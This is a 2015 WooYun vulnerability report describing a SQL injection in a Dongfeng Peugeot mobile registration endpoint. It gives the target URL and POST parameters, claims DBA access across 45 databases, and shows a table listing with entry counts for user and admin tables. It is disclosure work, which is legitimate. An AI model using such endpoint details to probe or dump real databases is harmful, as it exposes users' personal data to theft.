当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157598

漏洞标题:东风标致某站SQL注入漏洞可影响用户敏感数据

相关厂商:标致雪铁龙(中国)汽车贸易有限公司

漏洞作者: ledoo

提交时间:2015-12-02 14:52

修复时间:2016-01-16 14:54

公开时间:2016-01-16 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

东风标致某站SQL注入漏洞

详细说明:

http://m.peugeot.com.cn:80/campaign/user/user.php?action=register


(POST)

action=register&code=94102&email=sample@email.tst&nick_name=lenyeyjs&real_name=lenyeyjs&register_source=&sex=1&user_cell=lenyeyjs&user_pwd=lenyeyjs


标致.png


漏洞证明:

45个库:

db.png


DBA权限:

dba.png


Database: peugeot_cn
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| cms_log | 1372712 |
| cms_attachment_index | 451277 |
| cms_attachment | 443600 |
| cms_news_history | 188950 |
| cms_user_detail | 187872 |
| cms_user | 187762 |
| cms_hits | 183318 |
| cms_search | 177833 |
| cms_news_data | 177654 |
| cms_news | 177634 |
| cms_send_log | 148998 |
| cms_business_testdrive_data | 88019 |
| cms_business_testdrive | 77801 |
| cms_wap_testdrive | 50661 |
| cms_wap_testdrive_data | 50661 |
| cms_testdrive_sms | 38845 |
| cms_category_priv | 33993 |
| cms_app_log | 19742 |
| cms_business_buycar_data | 9119 |
| cms_business_buycar | 9118 |
| cms_wap_buycar_data | 6649 |
| cms_wap_buycar | 6633 |
| cms_uerstest_info | 4242 |
| cms_category | 3780 |
| cms_linkage | 3749 |
| cms_dealer_history | 2926 |
| cms_dealer_data | 2549 |
| cms_avenue_audiovisual_history | 825 |
| cms_model_field | 748 |
| cms_session | 676 |
| cms_admin | 572 |
| cms_dealer | 569 |
| cms_avenue_audiovisual | 361 |
| cms_avenue_audiovisual_data | 361 |
| cms_menu | 351 |
| cms_event_history | 321 |
| cms_avenue_collection_history | 226 |
| cms_as_history | 201 |
| cms_picture | 137 |
| cms_picture_data | 137 |
| cms_wap_infos_history | 116 |
| cms_avenue_collection | 94 |
| cms_avenue_collection_data | 94 |
| cms_admin_role_priv | 84 |
| cms_hr_history | 78 |
| cms_event | 67 |
| cms_event_data | 67 |
| cms_gg | 62 |
| cms_corporate_booking | 60 |
| cms_corporate_booking_data | 60 |
| cms_content_check | 59 |
| cms_cache | 50 |
| cms_wap_infos | 45 |
| cms_wap_infos_data | 45 |
| cms_admin_panel | 44 |
| cms_car_info | 44 |
| cms_car_info_data | 44 |
| cms_as | 35 |
| cms_as_data | 35 |
| cms_corporate_history | 34 |
| cms_hr | 33 |
| cms_hr_data | 33 |
| cms_module | 27 |
| cms_template_bak | 27 |
| cms_model | 25 |
| cms_type | 25 |
| cms_pd_series_sub_data | 23 |
| cms_pd_series_sub | 21 |
| cms_page | 17 |
| cms_wap_beautyshot | 13 |
| cms_wap_beautyshot_data | 13 |
| cms_sso_messagequeue | 11 |
| cms_position_data | 10 |
| cms_admin_role | 9 |
| cms_urlrule | 8 |
| cms_member_group | 7 |
| cms_corporate | 5 |
| cms_corporate_data | 5 |
| cms_sso_settings | 5 |
| cms_wap_downloads | 4 |
| cms_workflow | 4 |
| cms_member_menu | 3 |
| cms_poster_201401 | 3 |
| cms_wap_downloads_data | 3 |
| cms_comment_setting | 1 |
| cms_comment_table | 1 |
| cms_member_detail | 1 |
| cms_position | 1 |
| cms_poster | 1 |
| cms_poster_space | 1 |
| cms_site | 1 |
| cms_sso_admin | 1 |
| cms_sso_applications | 1 |
| cms_sso_members | 1 |
| cms_wap | 1 |
+----------------------------------------------------+---------+


修复方案:

检查过滤

版权声明:转载请注明来源 ledoo@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价